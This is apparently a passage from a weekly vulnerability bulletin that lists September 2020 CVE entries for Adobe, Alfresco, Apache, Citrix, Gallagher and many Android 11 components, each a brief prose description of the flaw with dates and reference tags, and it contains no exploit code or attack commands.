    Adobe Media Encoder version 14.3.2 (and earlier versions) has an out-of-bounds read vulnerability that could be exploited to read past the end of an allocated buffer, possibly resulting in a crash or disclosure of sensitive information from other memory locations. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. 2020-09-18 not yet calculated CVE-2020-9745
    MISC
    adobe -- media_encoder
     
    Adobe Media Encoder version 14.3.2 (and earlier versions) has an out-of-bounds read vulnerability that could be exploited to read past the end of an allocated buffer, possibly resulting in a crash or disclosure of sensitive information from other memory locations. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. 2020-09-18 not yet calculated CVE-2020-9739
    MISC
    adobe -- media_encoder
     
    Adobe Media Encoder version 14.3.2 (and earlier versions) has an out-of-bounds read vulnerability that could be exploited to read past the end of an allocated buffer, possibly resulting in a crash or disclosure of sensitive information from other memory locations. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. 2020-09-18 not yet calculated CVE-2020-9744
    MISC
    alfresco -- alfresco
     
    The Reset Password add-on before 1.2.0 for Alfresco suffers from CMIS-SQL Injection, which allows a malicious user to inject a query within the email input field. 2020-09-17 not yet calculated CVE-2020-25727
    MISC
    alfresco -- alfresco
     
    The Reset Password add-on before 1.2.0 for Alfresco has a broken algorithm (involving an increment) that allows a malicious user to change any user's account password include the admin account. 2020-09-17 not yet calculated CVE-2020-25728
    MISC
    alfresco -- alfresco
     
    The Alfresco Reset Password add-on before version 1.2.0 relies on untrusted inputs in a security decision. Intruders can get admin's access to the system using the vulnerability in the project. Impacts all servers where this add-on is installed. The problem is fixed in version 1.2.0 2020-09-18 not yet calculated CVE-2020-15181
    MISC
    CONFIRM
    amq -- online_console
     
    It was found in AMQ Online before 1.5.2 that injecting an invalid field to a user's AddressSpace configuration of the user namespace puts AMQ Online in an inconsistent state, where the AMQ Online components do not operate properly, such as the failure of provisioning and the failure of creating addresses, though this does not impact upon already existing messaging clients or brokers. 2020-09-16 not yet calculated CVE-2020-14348
    MISC
    apache -- airflow
     
    In Apache Airflow < 1.10.12, the "origin" parameter passed to some of the endpoints like '/trigger' was vulnerable to XSS exploit. 2020-09-17 not yet calculated CVE-2020-13944
    MISC
    apache -- atlas
     
    Apache Atlas before 2.1.0 contain a XSS vulnerability. While saving search or rendering elements values are not sanitized correctly and because of that it triggers the XSS vulnerability. 2020-09-16 not yet calculated CVE-2020-13928
    MISC
    apache -- superset
     
    While investigating a bug report on Apache Superset, it was determined that an authenticated user could craft requests via a number of templated text fields in the product that would allow arbitrary access to Python?s `os` package in the web application process in versions < 0.37.1. It was thus possible for an authenticated user to list and access files, environment variables, and process information. Additionally it was possible to set environment variables for the current process, create and update files in folders writable by the web process, and execute arbitrary programs accessible by the web process. All other operations available to the `os` package in Python were also available, even if not explicitly enumerated in this CVE. 2020-09-17 not yet calculated CVE-2020-13948
    MISC
    apache -- syncope
     
    In Apache Syncope 2.1.X releases prior to 2.1.7, when the Flowable extension is enabled, an administrator with workflow entitlements can use Shell Service Tasks to perform malicious operations, including but not limited to file read, file write, and code execution. 2020-09-15 not yet calculated CVE-2020-11977
    MISC
    bosch -- smart_home_system
     
    Improper certificate validation for certain connections in the Bosch Smart Home System App for iOS prior to version 9.17.1 potentially allows to intercept video contents by performing a man-in-the-middle attack. 2020-09-16 not yet calculated CVE-2020-6781
    MISC
    buffalo -- airstation_whr-g54s
     
    Directory traversal vulnerability in WHR-G54S firmware 1.43 and earlier allows an attacker to access sensitive information such as setting values via unspecified vectors. 2020-09-18 not yet calculated CVE-2020-5605
    MISC
    MISC
    buffalo -- airstation_whr-g54s
     
    Cross-site scripting vulnerability in WHR-G54S firmware 1.43 and earlier allows remote attackers to inject arbitrary script via a specially crafted page. 2020-09-18 not yet calculated CVE-2020-5606
    MISC
    MISC
    citrix -- multiple_products
     
    Improper Input Validation on Citrix ADC and Citrix Gateway 13.0 before 13.0-64.35, Citrix ADC and NetScaler Gateway 12.1 before 12.1-58.15, Citrix ADC 12.1-FIPS before 12.1-55.187, Citrix ADC and NetScaler Gateway 12.0, Citrix ADC and NetScaler Gateway 11.1 before 11.1-65.12, Citrix SD-WAN WANOP 11.2 before 11.2.1a, Citrix SD-WAN WANOP 11.1 before 11.1.2a, Citrix SD-WAN WANOP 11.0 before 11.0.3f, Citrix SD-WAN WANOP 10.2 before 10.2.7b leads to an HTML Injection attack against the SSL VPN web portal. 2020-09-18 not yet calculated CVE-2020-8245
    MISC
    citrix -- multiple_products
     
    Citrix ADC and Citrix Gateway 13.0 before 13.0-64.35, Citrix ADC and NetScaler Gateway 12.1 before 12.1-58.15, Citrix ADC 12.1-FIPS before 12.1-55.187, Citrix ADC and NetScaler Gateway 12.0, Citrix ADC and NetScaler Gateway 11.1 before 11.1-65.12, Citrix SD-WAN WANOP 11.2 before 11.2.1a, Citrix SD-WAN WANOP 11.1 before 11.1.2a, Citrix SD-WAN WANOP 11.0 before 11.0.3f, Citrix SD-WAN WANOP 10.2 before 10.2.7b are vulnerable to a denial of service attack originating from the management network. 2020-09-18 not yet calculated CVE-2020-8246
    MISC
    citrix -- multiple_products
     
    Citrix ADC and Citrix Gateway 13.0 before 13.0-64.35, Citrix ADC and NetScaler Gateway 12.1 before 12.1-58.15, Citrix ADC 12.1-FIPS before 12.1-55.187, Citrix ADC and NetScaler Gateway 12.0, Citrix ADC and NetScaler Gateway 11.1 before 11.1-65.12, Citrix SD-WAN WANOP 11.2 before 11.2.1a, Citrix SD-WAN WANOP 11.1 before 11.1.2a, Citrix SD-WAN WANOP 11.0 before 11.0.3f, Citrix SD-WAN WANOP 10.2 before 10.2.7b are vulnerable to escalation of privileges on the management interface. 2020-09-18 not yet calculated CVE-2020-8247
    MISC
    citrix -- multiple_xenmobile_servers
     
    Improper authentication in Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6 and Citrix XenMobile Server before 10.9 RP5 leads to the ability to access sensitive files. 2020-09-18 not yet calculated CVE-2020-8253
    MISC
    citrix -- storefront_server
     
    Improper authentication in Citrix StoreFront Server < 1912.0.1000 allows an attacker who is authenticated on the same Microsoft Active Directory domain as a Citrix StoreFront server to read arbitrary files from that server. 2020-09-18 not yet calculated CVE-2020-8200
    MISC
    colin_percival -- bsdiff
     
    A memory corruption vulnerability is present in bspatch as shipped in Colin Percival?s bsdiff tools version 4.3. Insufficient checks when handling external inputs allows an attacker to bypass the sanity checks in place and write out of a dynamically allocated buffer boundaries. 2020-09-16 not yet calculated CVE-2020-14315
    MISC
    MISC
    MISC
    d-link -- dir-816L_and_dir-803_devices
     
    ** UNSUPPORTED WHEN ASSIGNED ** webinc/js/info.php on D-Link DIR-816L 2.06.B09_BETA and DIR-803 1.04.B02 devices allows XSS via the HTTP Referer header. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: this is typically not exploitable because of URL encoding (except in Internet Explorer) and because a web page cannot specify that a client should make an additional HTTP request with an arbitrary Referer header. 2020-09-19 not yet calculated CVE-2020-25786
    MISC
    MISC
    dotplant2 -- dotplant2
     
    ** UNSUPPORTED WHEN ASSIGNED ** An issue was discovered in DotPlant2 before 2020-09-14. In class Pay2PayPayment in payment/Pay2PayPayment.php, there is an XXE vulnerability in the checkResult function. The user input ($_POST['xml']) is used for simplexml_load_string without sanitization. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. 2020-09-18 not yet calculated CVE-2020-25750
    MISC
    elkarbackup -- elkarbackup
     
    A Sensitive Source Code Path Disclosure vulnerability is found in ElkarBackup v1.3.3. An attacker is able to view the path of the source code jobs/sort where entire source code path is displayed in the browser itself helping the attacker identify the code structure /app/elkarbackup/src/Binovo/ElkarBackupBundle/Controller/DefaultController.php 2020-09-15 not yet calculated CVE-2020-24925
    MISC
    MISC
    ewon -- flexy_and_cosy
     
    All version of Ewon Flexy and Cosy prior to 14.1 use wildcards such as (*) under which domains can request resources. An attacker with local access and high privileges could inject scripts into the Cross-origin Resource Sharing (CORS) configuration that could abuse this vulnerability, allowing the attacker to retrieve limited confidential information through sniffing. 2020-09-18 not yet calculated CVE-2020-16230
    MISC
    fasterxml -- jackson-databind
     
    FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration. 2020-09-17 not yet calculated CVE-2020-24750
    MISC
    freebox -- freebox_hd
     
    A DNS rebinding vulnerability in Freebox HD before 1.5.29. 2020-09-16 not yet calculated CVE-2020-24374
    MISC
    freebox -- freebox_server
     
    A DNS rebinding vulnerability in the Freebox OS web interface in Freebox Server before 4.2.3. 2020-09-16 not yet calculated CVE-2020-24377
    MISC
    freebox -- upnp_idg
     
    A DNS rebinding vulnerability in the UPnP IGD implementations in Freebox Server before 4.2.3. 2020-09-16 not yet calculated CVE-2020-24376
    MISC
    freebox -- upnp_mediaserver
     
    A CSRF vulnerability in the UPnP MediaServer implementation in Freebox Server before 4.2.3. 2020-09-16 not yet calculated CVE-2020-24373
    MISC
    fwupd -- fwupd
     
    A PGP signature bypass flaw was found in fwupd (all versions), which could lead to the installation of unsigned firmware. As per upstream, a signature bypass is theoretically possible, but not practical because the Linux Vendor Firmware Service (LVFS) is either not implemented or enabled in versions of fwupd shipped with Red Hat Enterprise Linux 7 and 8. The highest threat from this vulnerability is to confidentiality and integrity. 2020-09-15 not yet calculated CVE-2020-10759
    MISC
    MISC
    gallagher -- command_centre
     
    On controllers running versions of v8.20 prior to vCR8.20.200221b (distributed in v8.20.1093(MR2)), v8.10 prior to vGR8.10.179 (distributed in v8.10.1211(MR5)), v8.00 prior to vGR8.00.165 (Distributed in v8.00.1228(MR6)), v7.90 prior to vGR7.90.165 (distributed in v7.90.1038(MRX)), v7.80 or earlier, It is possible to retrieve site keys used for securing MIFARE Plus and Desfire using debug ports on T Series readers. 2020-09-15 not yet calculated CVE-2020-16097
    MISC
    gallagher -- command_centre
     
    In Gallagher Command Centre versions 8.10 prior to 8.10.1134(MR4), 8.00 prior to 8.00.1161(MR5), 7.90 prior to 7.90.991(MR5), 7.80 prior to 7.80.960(MR2), 7.70 and earlier, any operator account has access to all data that would be replicated if the system were to be (or is) attached to a multi-server environment. This can include plain text credentials for DVR systems and card details used for physical access/alarm/perimeter components. 2020-09-15 not yet calculated CVE-2020-16096
    MISC
    gallagher -- command_centre
     
    It is possible for an unauthenticated remote DCOM websocket connection to crash the Command Centre service due to an out-of-bounds buffer access. Affected versions are v8.20 prior to v8.20.1166(MR3), v8.10 prior to v8.10.1211(MR5), v8.00 prior to v8.00.1228(MR6), all versions of 7.90 and earlier. 2020-09-15 not yet calculated CVE-2020-16101
    MISC
    gallagher -- command_centre
     
    It is possible for an unauthenticated remote DCOM websocket connection to crash the Command Centre service's DCOM websocket thread due to improper shutdown of closed websocket connections, preventing it from accepting future DCOM websocket (Configuration Client) connections. Affected versions are v8.20 prior to v8.20.1166(MR3), v8.10 prior to v8.10.1211(MR5), v8.00 prior to v8.00.1228(MR6), all versions of 7.90 and earlier. 2020-09-15 not yet calculated CVE-2020-16100
    MISC
    gallagher -- command_centre
     
    In Gallagher Command Centre v8.20 prior to v8.20.1093(MR2) it is possible to create Guard Tour events that when accessed via things like reporting cause clients to temporarily hang or disconnect. 2020-09-15 not yet calculated CVE-2020-16099
    MISC
    gallagher -- command_centre
     
    It is possible to enumerate access card credentials via an unauthenticated network connection to the server in versions of Command Centre v8.20 prior to v8.20.1166(MR3), versions of 8.10 prior to v8.10.1211(MR5), versions of 8.00 prior to v8.00.1228(MR6), all versions of 7.90 and earlier. These credentials can then be used to encode low security cards to be used by the system where insecure card technologies are supported. 2020-09-15 not yet calculated CVE-2020-16098
    MISC
    genexis -- platinum_4410
     
    A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point?s password. 2020-09-16 not yet calculated CVE-2020-25015
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. The profile activity page was not restricting the amount of results one could request, potentially resulting in a denial of service. 2020-09-14 not yet calculated CVE-2020-13315
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab
     
    A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab was vulnerable to a blind SSRF attack through the repository mirroring feature. 2020-09-14 not yet calculated CVE-2020-13309
    CONFIRM
    MISC
    MISC
    gnuplot -- gnuplot
     
    gnuplot 5.4 is affected by a segmentation fault in com_line () at command.c, which may result in context-dependent arbitrary code execution. 2020-09-16 not yet calculated CVE-2020-25412
    MISC
    gnuplot -- gnuplot
     
    gnuplot 5.5 is affected by double free when executing print_set_output. This may result in context-dependent arbitrary code execution. 2020-09-16 not yet calculated CVE-2020-25559
    MISC
    google -- android_10_and_11_devices In the app zygote SE Policy, there is a possible permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-157598026 2020-09-17 not yet calculated CVE-2020-0390
    MISC
    google -- android_10_and_11_devices In RunInternal of dumpstate.cpp, there is a possible user consent bypass due to an uncaught exception. This could lead to local information disclosure of bug report data with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-152944488 2020-09-17 not yet calculated CVE-2020-0382
    MISC
    google -- android_10_and_11_devices
     
    In createEmergencyLocationUserNotification of GnssVisibilityControl.java, there is a possible permissions bypass due to an empty mutable PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-156123285 2020-09-17 not yet calculated CVE-2020-0388
    MISC
    google -- android_10_and_11_devices
     
    In createSaveNotification of RecordingService.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-156959408 2020-09-17 not yet calculated CVE-2020-0389
    MISC
    google -- android_11_devices In iorap, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege and code execution with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-150331085 2020-09-17 not yet calculated CVE-2020-0330
    MISC
    google -- android_11_devices In NFC, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure. System execution privileges, a Firmware compromise, and User interaction are needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-144506224 2020-09-18 not yet calculated CVE-2020-0282
    MISC
    google -- android_11_devices In libmedia, there is a possible resource exhaustion due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-132274514 2020-09-17 not yet calculated CVE-2020-0363
    MISC
    google -- android_11_devices In WindowManager, there is a possible launch of an unexpected app due to a confused deputy. This could lead to local escalation of privilege due to launching a malicious app instead of the one the user intended, with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-139128211 2020-09-17 not yet calculated CVE-2020-0267
    MISC
    google -- android_11_devices In UrlQuerySanitizer, there is a possible improper input validation. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-73822755 2020-09-17 not yet calculated CVE-2020-0333
    MISC
    google -- android_11_devices In factory reset protection, there is a possible FRP bypass due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-111086459 2020-09-17 not yet calculated CVE-2020-0266
    MISC
    google -- android_11_devices In libDRCdec, there is a possible information disclosure due to uninitialized data. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-151927433 2020-09-17 not yet calculated CVE-2020-0361
    MISC
    google -- android_11_devices In the System UI, there is a possible system crash due to an uncaught exception. This could lead to local permanent denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-33646131 2020-09-18 not yet calculated CVE-2020-0318
    MISC
    google -- android_11_devices In DisplayManager, there is a possible permission bypass due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-144920149 2020-09-17 not yet calculated CVE-2020-0341
    MISC
    google -- android_11_devices In Bluetooth, there is a possible spoofing of bluetooth device metadata due to a missing permission check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-145130119 2020-09-18 not yet calculated CVE-2020-0299
    MISC
    google -- android_11_devices In the OMX parser, there is a possible information disclosure due to a returned raw pointer. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-120781925 2020-09-17 not yet calculated CVE-2020-0274
    MISC
    google -- android_11_devices In DocumentsUI, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-144286721 2020-09-17 not yet calculated CVE-2020-0345
    MISC
    google -- android_11_devices In LLVM, there is a possible ineffective stack cookie placement due to stack frame double reservation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-139666480 2020-09-17 not yet calculated CVE-2020-0306
    MISC
    google -- android_11_devices In Window Manager, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-153654357 2020-09-17 not yet calculated CVE-2020-0308
    MISC
    google -- android_11_devices In NFC, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges and a Firmware compromise needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-137868765 2020-09-18 not yet calculated CVE-2020-0319
    MISC
    google -- android_11_devices In libFraunhoferAAC, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-141883493 2020-09-17 not yet calculated CVE-2020-0355
    MISC
    google -- android_11_devices In ActivityManager, there is a possible access to protected data due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-119673147 2020-09-17 not yet calculated CVE-2020-0372
    MISC
    google -- android_11_devices
     
    In SurfaceFlinger, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-150227563 2020-09-17 not yet calculated CVE-2020-0358
    MISC
    google -- android_11_devices
     
    In libDRCdec, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-137282770 2020-09-17 not yet calculated CVE-2020-0364
    MISC
    google -- android_11_devices
     
    In Mediaserver, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege if integer sanitization were not enabled (which it is by default), with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-147002762 2020-09-17 not yet calculated CVE-2020-0346
    MISC
    google -- android_11_devices
     
    In SyncManager, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-154921790 2020-09-17 not yet calculated CVE-2020-0426
    MISC
    google -- android_11_devices
     
    In AudioService, there are missing permission checks. This could lead to local information disclosure of audio configuration with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-154934920 2020-09-17 not yet calculated CVE-2020-0314
    MISC
    google -- android_11_devices
     
    In Bluetooth, there is a possible control over Bluetooth enabled state due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-145129266 2020-09-18 not yet calculated CVE-2020-0298
    MISC
    google -- android_11_devices
     
    In Notification Access Confirmation, there is a possible permissions bypass due to uninformed consent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-145129456 2020-09-17 not yet calculated CVE-2020-0360
    MISC
    google -- android_11_devices
     
    There is a possible way to view notifications even when the "Lockdown" feature is on. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-124000380 2020-09-17 not yet calculated CVE-2020-0425
    MISC
    google -- android_11_devices
     
    In libstagefright, there is a possible resource exhaustion due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-123237930 2020-09-17 not yet calculated CVE-2020-0362
    MISC
    google -- android_11_devices
     
    In NFC, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure over NFC with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-139188582 2020-09-18 not yet calculated CVE-2020-0348
    MISC
    google -- android_11_devices
     
    In SurfaceFlinger, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in the graphics server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-150225569 2020-09-17 not yet calculated CVE-2020-0357
    MISC
    google -- android_11_devices
     
    In the Audio HAL, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-143787559 2020-09-17 not yet calculated CVE-2020-0356
    MISC
    google -- android_11_devices
     
    In Bluetooth, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-143604331 2020-09-18 not yet calculated CVE-2020-0354
    MISC
    google -- android_11_devices
     
    In libmp4extractor, there is a possible resource exhaustion due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-124777526 2020-09-17 not yet calculated CVE-2020-0353
    MISC
    google -- android_11_devices
     
    In MediaProvider, there is a possible permissions bypass due to SQL injection. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-132074310 2020-09-17 not yet calculated CVE-2020-0352
    MISC
    google -- android_11_devices
     
    In libstagefright, there is possible CPU exhaustion due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-124777537 2020-09-17 not yet calculated CVE-2020-0351
    MISC
    google -- android_11_devices
     
    In NFC, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges and a Firmware compromise needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-139424089 2020-09-18 not yet calculated CVE-2020-0350
    MISC
    google -- android_11_devices
     
    In NFC, there is a possible out of bounds read due to uninitialized data. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-148736216 2020-09-18 not yet calculated CVE-2020-0300
    MISC
    google -- android_11_devices
     
    In MediaProvider, there is a possible bypass of a permissions check due to a confused deputy. This could lead to local information disclosure, with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-124329382 2020-09-17 not yet calculated CVE-2020-0337
    MISC
    google -- android_11_devices
     
    In iptables, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-136658008 2020-09-18 not yet calculated CVE-2020-0347
    MISC
    google -- android_11_devices
     
    In libstagefright, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-116718596 2020-09-17 not yet calculated CVE-2020-0264
    MISC
    google -- android_11_devices
     
    In NetworkStackNotifier, there is a possible permissions bypass due to an unsafe implicit PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-157475111 2020-09-18 not yet calculated CVE-2020-0405
    MISC
    google -- android_11_devices
     
    In libmpeg2dec, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if another exploit allowed this to be triggered with different parameters, with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-137794014 2020-09-17 not yet calculated CVE-2020-0406
    MISC
    google -- android_11_devices
     
    In Telephony, there is a possible permission bypass due to a missing permission check. This could lead to local escalation of privilege and the setting of supported EUICC countries with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-156253476 2020-09-17 not yet calculated CVE-2020-0375
    MISC
    google -- android_11_devices
     
    In NFC, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-156251602 2020-09-17 not yet calculated CVE-2020-0374
    MISC
    google -- android_11_devices
     
    In SoundTriggerHwService, there is a possible out of bounds read due to a race condition. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-146894086 2020-09-17 not yet calculated CVE-2020-0373
    MISC
    google -- android_11_devices
     
    In libAACdec, there is a possible out of bounds read due to missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-112051700 2020-09-17 not yet calculated CVE-2020-0370
    MISC
    google -- android_11_devices
     
    In libavb, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-130231426 2020-09-17 not yet calculated CVE-2020-0369
    MISC
    google -- android_11_devices
     
    In GLESRenderEngine, there is a possible out of bounds read due to a buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-150303018 2020-09-17 not yet calculated CVE-2020-0359
    MISC
    google -- android_11_devices
     
    In netd, there is a possible out of bounds read due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-137346580 2020-09-18 not yet calculated CVE-2020-0365
    MISC
    google -- android_11_devices
     
    In libcodec2_soft_mp3dec, there is a possible information disclosure due to uninitialized data. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-144901522 2020-09-17 not yet calculated CVE-2020-0340
    MISC
    google -- android_11_devices
     
    In AccountManager, there is a possible bypass of a permissions check due to a confused deputy. This could lead to local information disclosure, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-123700107 2020-09-17 not yet calculated CVE-2020-0338
    MISC
    google -- android_11_devices
     
    In SurfaceFlinger, there is possible memory corruption due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-153467444 2020-09-17 not yet calculated CVE-2020-0336
    MISC
    google -- android_11_devices
     
    In MediaProvider, there is a possible permissions bypass due to SQL injection. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-140729887 2020-09-17 not yet calculated CVE-2020-0344
    MISC
    google -- android_11_devices
     
    In NFC, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges and a Firmware compromise needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-122361504 2020-09-18 not yet calculated CVE-2020-0335
    MISC
    google -- android_11_devices
     
    In NFC, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges and a Firmware compromise needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-147995915 2020-09-18 not yet calculated CVE-2020-0334
    MISC
    google -- android_11_devices
     
    In NetworkStatsService, there is a possible access to protected data due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-119672472 2020-09-17 not yet calculated CVE-2020-0343
    MISC
    google -- android_11_devices
     
    In libstagefright, there is a possible dead loop due to an uncaught exception. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-124783982 2020-09-17 not yet calculated CVE-2020-0332
    MISC
    google -- android_11_devices
     
    In the camera, there is a possible out of bounds read due to an integer overflow. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-150156131 2020-09-17 not yet calculated CVE-2020-0328
    MISC
    google -- android_11_devices
     
    In libsonivox, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-136660304 2020-09-17 not yet calculated CVE-2020-0324
    MISC
    google -- android_11_devices
     
    In libavb, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-146516087 2020-09-17 not yet calculated CVE-2020-0323
    MISC
    google -- android_11_devices
     
